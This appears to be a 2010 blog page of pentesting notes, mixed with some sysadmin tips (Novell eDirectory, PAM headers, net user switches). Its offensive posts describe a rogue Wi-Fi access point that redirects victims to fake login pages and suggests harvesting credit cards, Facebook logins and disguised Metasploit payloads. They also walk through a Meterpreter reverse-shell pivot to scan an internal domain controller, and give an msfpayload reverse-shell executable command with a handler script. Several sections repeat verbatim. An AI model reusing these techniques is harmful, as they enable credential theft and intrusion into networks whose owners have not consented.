Re-hosting the resolution since it appears Novell's server goes down from time to time when I attempted to re-reference:
Install Novell eDirctory Adminstration Utilies as follows.
Extract the tar.gz file for eDirectory installation and locate the directory /eDirectory/setup.
Type ./nds-install from the setup directory.
Select option 2 for installing Novell eDirectory Administartion utilities.
Edit /etc/ld.so.conf file and make sure entry /opt/novell/eDirectory/lib is in the file. If not add the path in there and save the file.
Type "ldconfig" and press Enter.
If the following error is received after following the steps listed above, please reboot the server
"ice: error while loading shared libraries: libldapsdk.so.0: cannot open shared object file: No such file or directory"
Thursday, November 11, 2010
Wednesday, November 10, 2010
Rogue Access Point
Rogue AP using GTWPA from Dean Liu on Vimeo.
GTWPA project is a wrapper around airbase-ng and dnsspoof. Redirects HTTP traffic to your malicious web server when the victim attempts to browse.
See project here:
crack-wifi.com/forum/viewtopic.php?id=363
I modified code base such that it enables attacking machine as web proxy after credentials are submitted.
You can serve up any login page you want. Here are some ideas: ask for credit card, Facebook login, serve up Metasploit payloads as Windows updates, etc.
Tuesday, November 9, 2010
Google Hacking Database
http://www.exploit-db.com/google-dorks/
Recently resurrected by exploit-db.
Repository of queries that may disclose sensitive information which may lead to compromise.
Saturday, November 6, 2010
Thursday, October 28, 2010
pam_appl.h and pam_modules.h "No such file or Directory"
If you're creating custom pam modules, you will need these two headers to compile your source code.
These header files are in the "pam-devel" package.
In SUSE - SLED/SLES use: 'yast -i pam-devel' to install the appropriate packages.
In SUSE - SLED/SLES use: 'yast -i pam-devel' to install the appropriate packages.
Monday, October 25, 2010
Scanning through SOCKS + Meterpreter
Source: http://www.digininja.org/blog/nessus_over_sock4a_over_msf.php
Below is a walk through of the steps I went through to get the scan. The actors in this play are:
192.168.0.2 - The attacking machine
10.1.1.5 - The compromised machine
10.1.1.2 - The machine I want to scan
There is no normal route from the 192 network into the 10 network, the router at 10.1.1.1 prevents this.
robin@attacker metasploit $ ./msfconsole
___________
< DigiNinja >
-----------
\ ^__^
\ (oo)\_______
(__)\ )\/\
||----w |
|| ||
=[ metasploit v3.5.1-dev [core:3.5 api:1.0]
+ -- --=[ 613 exploits - 309 auxiliary
+ -- --=[ 215 payloads - 27 encoders - 8 nops
=[ svn r10774 updated today (2010.10.21)
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lport 31337
lport => 31337
msf exploit(handler) > set lhost 192.168.0.2
lhost => 192.168.0.2
msf exploit(handler) > exploit -j
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.0.2:31337
[*] Starting the payload handler...
msf exploit(handler) > [*] Sending stage (749056 bytes) to 192.168.0.80
[*] Meterpreter session 1 opened (192.168.0.2:31337 -> 192.168.0.80:24592) at 2010-10-22 10:38:18 +0100
msf exploit(handler) > route add 10.1.1.0 255.255.255.0 1
msf exploit(handler) > use auxiliary/server/socks4a
msf auxiliary(socks4a) > run
[*] Auxiliary module execution completed
[*] Starting the socks4a proxy server
msf auxiliary(socks4a) >
Check the tunnel is working. I don't speak SMB but if you do this and see the OK then the connection has been made and you can just enter some rubbish and hit return a few times, the other end will drop the connection pretty quickly. Pick a port you know, or expect, to be open on the target machine, SMB is usually a good choice for a Windows box.
root@attacker sbin # proxychains nc 10.1.1.2 445
ProxyChains-3.1 (http://proxychains.sf.net)
|S-chain|-<>-127.0.0.1:1080-<><>-10.1.1.2:445-<><>-OK
dummy...
Before you start Nessus with proxychains you'll need to modify the proxychains config (/etc/proxychains.conf). In my default config I needed to add the following line to the end.
socks4 127.0.0.1 1080
And now start Nessus
root@attacker sbin # proxychains ./nessus-service -D
Scans take a LONG time, with a default Nessus policy it took me 4242 seconds to scan the compromised machine, that is nearly an hour and a quarter so I've created a minimal policy to work with for this type of scanning. First we load the nessus module the connect to it, check the policies and finally fire off a scan.
msf auxiliary(socks4a) > load nessus
[*] Nessus Bridge for Nessus 4.2.x
[+] Type nessus_help for a command listing
[*] Successfully loaded plugin: nessus
msf auxiliary(socks4a) > nessus_connect robin@localhost
[+] Password:
...
[*] Connecting to https://localhost:8834/ as robin
[*] Authenticated
msf auxiliary(socks4a) > nessus_policy_list
[+] Nessus Policy List
ID Name Comments
-- ---- --------
4 Minimal MS
3 noping
2 Web
1 All
msf auxiliary(socks4a) > nessus_scan_new 4 "Quick Windows" 10.1.1.2
[*] Creating scan from policy number 4, called "Quick Windows" and scanning 10.1.1.2
[*] Scan started. uid is 60625093-5e0c-74a0-bc04-a35f19ffa65adb108fa286291aee
msf auxiliary(socks4a) > nessus_scan_status
[+] Running Scans
Scan ID Name Owner Started Status Current Hosts Total Hosts
------- ---- ----- ------- ------ ------------- -----------
60625093-5e0c-74a0-bc04-a35f19ffa65adb108fa286291aee Quick Windows robin 12:39 Oct 22 2010 running 0 1
[*] You can:
[+] Import Nessus report to database : nessus_report_get
[+] Pause a nessus scan : nessus_scan_pause
Now sit back for a LONG wait. You can check the status with nessus_scan_status
msf auxiliary(socks4a) > nessus_scan_status
[+] Running Scans
Scan ID Name Owner Started Status Current Hosts Total Hosts
------- ---- ----- ------- ------ ------------- -----------
60625093-5e0c-74a0-bc04-a35f19ffa65adb108fa286291aee Quick Windows robin 12:39 Oct 22 2010 running 0 1
When it finall finishes you can check the results and load them into your Metasploit database
msf auxiliary(socks4a) > db_connect msf.db
[-] Note that sqlite is not supported due to numerous issues.
[-] It may work, but don't count on it
[*] Creating a new database file...
[*] Successfully connected to the database
[*] File: msf.db
msf auxiliary(socks4a) > nessus_report_get 60625093-5e0c-74a0-bc04-a35f19ffa65adb108fa286291aee
[*] importing 60625093-5e0c-74a0-bc04-a35f19ffa65adb108fa286291aee
[*] 10.1.1.2 Done!
[+] Done
msf auxiliary(socks4a) > db_hosts
Hosts
=====
address address6 arch comm comments created_at info mac name os_flavor os_lang os_name os_sp purpose state updated_at svcs vulns workspace
------- -------- ---- ---- -------- ---------- ---- --- ---- --------- ------- ------- ----- ------- ----- ---------- ---- ----- ---------
10.1.1.2 2010-10-22 14:09:22 UTC 00:13:3b:04:03:52 CORP_DC alive 2010-10-22 14:09:22 UTC 5 6 default
So, there we have it, a full Nessus scan through a Meterpreter pivot with everything done in memory on the compromised machine. A very neat and tidy attack.
Below is a walk through of the steps I went through to get the scan. The actors in this play are:
192.168.0.2 - The attacking machine
10.1.1.5 - The compromised machine
10.1.1.2 - The machine I want to scan
There is no normal route from the 192 network into the 10 network, the router at 10.1.1.1 prevents this.
robin@attacker metasploit $ ./msfconsole
___________
< DigiNinja >
-----------
\ ^__^
\ (oo)\_______
(__)\ )\/\
||----w |
|| ||
=[ metasploit v3.5.1-dev [core:3.5 api:1.0]
+ -- --=[ 613 exploits - 309 auxiliary
+ -- --=[ 215 payloads - 27 encoders - 8 nops
=[ svn r10774 updated today (2010.10.21)
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lport 31337
lport => 31337
msf exploit(handler) > set lhost 192.168.0.2
lhost => 192.168.0.2
msf exploit(handler) > exploit -j
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.0.2:31337
[*] Starting the payload handler...
msf exploit(handler) > [*] Sending stage (749056 bytes) to 192.168.0.80
[*] Meterpreter session 1 opened (192.168.0.2:31337 -> 192.168.0.80:24592) at 2010-10-22 10:38:18 +0100
msf exploit(handler) > route add 10.1.1.0 255.255.255.0 1
msf exploit(handler) > use auxiliary/server/socks4a
msf auxiliary(socks4a) > run
[*] Auxiliary module execution completed
[*] Starting the socks4a proxy server
msf auxiliary(socks4a) >
Check the tunnel is working. I don't speak SMB but if you do this and see the OK then the connection has been made and you can just enter some rubbish and hit return a few times, the other end will drop the connection pretty quickly. Pick a port you know, or expect, to be open on the target machine, SMB is usually a good choice for a Windows box.
root@attacker sbin # proxychains nc 10.1.1.2 445
ProxyChains-3.1 (http://proxychains.sf.net)
|S-chain|-<>-127.0.0.1:1080-<><>-10.1.1.2:445-<><>-OK
dummy...
Before you start Nessus with proxychains you'll need to modify the proxychains config (/etc/proxychains.conf). In my default config I needed to add the following line to the end.
socks4 127.0.0.1 1080
And now start Nessus
root@attacker sbin # proxychains ./nessus-service -D
Scans take a LONG time, with a default Nessus policy it took me 4242 seconds to scan the compromised machine, that is nearly an hour and a quarter so I've created a minimal policy to work with for this type of scanning. First we load the nessus module the connect to it, check the policies and finally fire off a scan.
msf auxiliary(socks4a) > load nessus
[*] Nessus Bridge for Nessus 4.2.x
[+] Type nessus_help for a command listing
[*] Successfully loaded plugin: nessus
msf auxiliary(socks4a) > nessus_connect robin@localhost
[+] Password:
...
[*] Connecting to https://localhost:8834/ as robin
[*] Authenticated
msf auxiliary(socks4a) > nessus_policy_list
[+] Nessus Policy List
ID Name Comments
-- ---- --------
4 Minimal MS
3 noping
2 Web
1 All
msf auxiliary(socks4a) > nessus_scan_new 4 "Quick Windows" 10.1.1.2
[*] Creating scan from policy number 4, called "Quick Windows" and scanning 10.1.1.2
[*] Scan started. uid is 60625093-5e0c-74a0-bc04-a35f19ffa65adb108fa286291aee
msf auxiliary(socks4a) > nessus_scan_status
[+] Running Scans
Scan ID Name Owner Started Status Current Hosts Total Hosts
------- ---- ----- ------- ------ ------------- -----------
60625093-5e0c-74a0-bc04-a35f19ffa65adb108fa286291aee Quick Windows robin 12:39 Oct 22 2010 running 0 1
[*] You can:
[+] Import Nessus report to database : nessus_report_get
[+] Pause a nessus scan : nessus_scan_pause
Now sit back for a LONG wait. You can check the status with nessus_scan_status
msf auxiliary(socks4a) > nessus_scan_status
[+] Running Scans
Scan ID Name Owner Started Status Current Hosts Total Hosts
------- ---- ----- ------- ------ ------------- -----------
60625093-5e0c-74a0-bc04-a35f19ffa65adb108fa286291aee Quick Windows robin 12:39 Oct 22 2010 running 0 1
When it finall finishes you can check the results and load them into your Metasploit database
msf auxiliary(socks4a) > db_connect msf.db
[-] Note that sqlite is not supported due to numerous issues.
[-] It may work, but don't count on it
[*] Creating a new database file...
[*] Successfully connected to the database
[*] File: msf.db
msf auxiliary(socks4a) > nessus_report_get 60625093-5e0c-74a0-bc04-a35f19ffa65adb108fa286291aee
[*] importing 60625093-5e0c-74a0-bc04-a35f19ffa65adb108fa286291aee
[*] 10.1.1.2 Done!
[+] Done
msf auxiliary(socks4a) > db_hosts
Hosts
=====
address address6 arch comm comments created_at info mac name os_flavor os_lang os_name os_sp purpose state updated_at svcs vulns workspace
------- -------- ---- ---- -------- ---------- ---- --- ---- --------- ------- ------- ----- ------- ----- ---------- ---- ----- ---------
10.1.1.2 2010-10-22 14:09:22 UTC 00:13:3b:04:03:52 CORP_DC alive 2010-10-22 14:09:22 UTC 5 6 default
So, there we have it, a full Nessus scan through a Meterpreter pivot with everything done in memory on the compromised machine. A very neat and tidy attack.
Wednesday, October 20, 2010
psexec logon failure and access denied
If you're experiencing logon failures with your lab testing in psexec (be it standalone psexec tool, or the auxiliary psexec module found within Metasploit)
Source: http://antonperez.com/2007/11/28/pstools-access-denied-error/
Here are the settings/steps I checked/took that resolved the issue:
1. ping - was able to ping the machine by hostname. So no problem here.
2. net share - verified the ADMIN$ share was enabled. Again no problem here.
3. Remote Registry service - verified the service was started because the PsTools suite makes use of RPC calls via port 445. Was fine here.
4. Administrator password - verified the Administrator did not have an empty password. Was set here.
5. Test account - created a test account to use for psexec (e.g., psexec \\computer_name notepad.exe -u test -p test). Was available here.
6. Access hidden share – tried to access C$ and found that user name field grayed out. This tipped off the problem – cool!
To fix it, I had to set the "Network Access: Sharing and security model for local accounts security option Classic – local users authenticate as themselves."
Access it via Start > Run > secpol.msc > Local Policies > Security Options
Change "Network Access: Sharing and security model for local accounts" to "Classic - local users authenticate as themselves"
Apparently, updates to Windows XP now sets this security option to Guest only – local users authenticate as Guest, which denies the ability to implicitly or explicitly use of a specific user name/password combo.
Source: http://antonperez.com/2007/11/28/pstools-access-denied-error/
Here are the settings/steps I checked/took that resolved the issue:
1. ping - was able to ping the machine by hostname. So no problem here.
2. net share - verified the ADMIN$ share was enabled. Again no problem here.
3. Remote Registry service - verified the service was started because the PsTools suite makes use of RPC calls via port 445. Was fine here.
4. Administrator password - verified the Administrator did not have an empty password. Was set here.
5. Test account - created a test account to use for psexec (e.g., psexec \\computer_name notepad.exe -u test -p test). Was available here.
6. Access hidden share – tried to access C$ and found that user name field grayed out. This tipped off the problem – cool!
To fix it, I had to set the "Network Access: Sharing and security model for local accounts security option Classic – local users authenticate as themselves."
Access it via Start > Run > secpol.msc > Local Policies > Security Options
Change "Network Access: Sharing and security model for local accounts" to "Classic - local users authenticate as themselves"
Apparently, updates to Windows XP now sets this security option to Guest only – local users authenticate as Guest, which denies the ability to implicitly or explicitly use of a specific user name/password combo.
Friday, October 15, 2010
Thursday, October 14, 2010
Tuesday, October 12, 2010
Monday, October 11, 2010
Monday, September 27, 2010
Saturday, September 18, 2010
Thursday, August 19, 2010
Tuesday, August 17, 2010
Sunday, August 15, 2010
Windows Associated PID with Port
Unlike linux's nice netstat -anp, windows yet again tries to make life difficult to accomplish the same task:
tasklist /svc /FI "PID eq [port]" //displays service associated with open port.
Monday, August 9, 2010
Automating Metasploit with Shell Scripting
Created a small shell script to automate the multi/handler in Metasploit. This script works with msfpayload executable (ex: ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.6 LPORT=8080 X > happy.exe) .
MSF_PATH="/pentest/exploits/framework3/"
MSFCLI=$MSF_PATH"msfcli";
INTERFACE="eth0";
LPORT="8080";
PAYLOAD="windows/meterpreter/reverse_tcp";
echo "Metasploit multi/handler";
LHOST=`ifconfig $INTERFACE | grep "inet addr" | cut -d":" -f2 | cut -d" " -f1`;
echo "LHOST=$LHOST";
echo "LPORT=$LPORT";
$MSFCLI multi/handler PAYLOAD=$PAYLOAD LHOST=$LHOST LPORT=$LPORT E
Thursday, August 5, 2010
Windows net user commands reference
Reference: http://articles.techrepublic.com.com/5100-10878_11-5031577.html
ex: net user [account] /delete
/DOMAIN—Performs the operation on a domain controller of the current domain.
/ADD—Adds a user account to the user accounts database.
/DELETE—Removes a user account from the user accounts database.
/ACTIVE:—Type /ACTIVE:YES to activate the account. /ACTIVE:NO deactivates the account.
/COMMENT:”text”—You can use this command to provide a comment about the user. You can enter up to 48 characters as a description. Make sure you enclose the comment in quotation marks.
/COUNTRYCODE:—This switch allows you to change the operating system country code for the user. This will cause Windows to implement a language file for a user's help and error messages. A value of 0 signifies the default country code.
/EXPIRES:—This switch allows you to set an expiration date for the user. You can either enter a date in mm/dd/yyyy format or enter a value of NEVER. NEVER sets no expiration for the account.
/FULLNAME:"name"—This switch changes the user's full name, not the username. Replace name with the user’s name enclosed in quotation marks.
/HOMEDIR:pathname—This switch sets the path (pathname) for the user's home directory. The path must already exist for the switch to work properly.
/PASSWORDCHG:—If you type /PASSWORDCHG:YES, users can change their own passwords. Conversely, setting it to NO disables password changing. The default is YES.
/PASSWORDREQ:—This switch specifies whether a user account must have a password. The default is YES, but you can type /PASSWORDREQ:NO to disable passwords for the account.
/PROFILEPATH:pathname—This switch sets a path for the user's logon profile.
/SCRIPTPATH:pathname—This switch sets the location of the user's logon script.
/TIMES:—This switch allows you to set the user’s logon hours. If you set the value to ALL, the user can always log on. The syntax is reasonably complicated if you want to set available logon times. Times can only be expressed in one-hour increments. Starting times/days and ending times/days are separated by a dash (-). Days, and times in the same day, are separated by a comma (,). Multiple day/time combinations are separated by a semicolon (;). This might be a setting that would be more efficient using a GUI.
/USERCOMMENT:"text"—This switch sets the User Comment field shown above. Don’t confuse it with the Comment switch just mentioned.
/WORKSTATIONS:—This switch allows you to specify workstation names the user can log in from. By default, a user can use any workstation. You can specify this explicitly by following this switch with an asterisk (*). To limit a user, type in individual workstation names. You can enter as many as eight workstation names, separating each one with a comma.
ex: net user [account] /delete
/DOMAIN—Performs the operation on a domain controller of the current domain.
/ADD—Adds a user account to the user accounts database.
/DELETE—Removes a user account from the user accounts database.
/ACTIVE:—Type /ACTIVE:YES to activate the account. /ACTIVE:NO deactivates the account.
/COMMENT:”text”—You can use this command to provide a comment about the user. You can enter up to 48 characters as a description. Make sure you enclose the comment in quotation marks.
/COUNTRYCODE:—This switch allows you to change the operating system country code for the user. This will cause Windows to implement a language file for a user's help and error messages. A value of 0 signifies the default country code.
/EXPIRES:—This switch allows you to set an expiration date for the user. You can either enter a date in mm/dd/yyyy format or enter a value of NEVER. NEVER sets no expiration for the account.
/FULLNAME:"name"—This switch changes the user's full name, not the username. Replace name with the user’s name enclosed in quotation marks.
/HOMEDIR:pathname—This switch sets the path (pathname) for the user's home directory. The path must already exist for the switch to work properly.
/PASSWORDCHG:—If you type /PASSWORDCHG:YES, users can change their own passwords. Conversely, setting it to NO disables password changing. The default is YES.
/PASSWORDREQ:—This switch specifies whether a user account must have a password. The default is YES, but you can type /PASSWORDREQ:NO to disable passwords for the account.
/PROFILEPATH:pathname—This switch sets a path for the user's logon profile.
/SCRIPTPATH:pathname—This switch sets the location of the user's logon script.
/TIMES:—This switch allows you to set the user’s logon hours. If you set the value to ALL, the user can always log on. The syntax is reasonably complicated if you want to set available logon times. Times can only be expressed in one-hour increments. Starting times/days and ending times/days are separated by a dash (-). Days, and times in the same day, are separated by a comma (,). Multiple day/time combinations are separated by a semicolon (;). This might be a setting that would be more efficient using a GUI.
/USERCOMMENT:"text"—This switch sets the User Comment field shown above. Don’t confuse it with the Comment switch just mentioned.
/WORKSTATIONS:—This switch allows you to specify workstation names the user can log in from. By default, a user can use any workstation. You can specify this explicitly by following this switch with an asterisk (*). To limit a user, type in individual workstation names. You can enter as many as eight workstation names, separating each one with a comma.
Subscribe to:
Posts (Atom)